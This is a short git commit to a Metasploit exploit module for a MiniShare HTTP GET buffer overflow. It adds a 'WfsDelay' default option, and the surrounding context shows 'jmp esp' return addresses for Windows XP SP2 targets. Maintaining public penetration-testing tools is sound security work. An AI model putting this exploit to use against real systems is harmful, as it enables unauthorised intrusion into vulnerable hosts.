Update minishare_get_overflow.rb

set WfsDelay 30
bug/bundler_fix
Adam Ziaja 2015-03-20 23:42:54 +01:00
parent 4004771aed
commit 921b9eab8e
1 changed files with 4 additions and 0 deletions

View File

@ -53,6 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
],
'DefaultOptions' =>
{
'WfsDelay' => 30
},
'DisclosureDate' => 'Nov 7 2004'))
end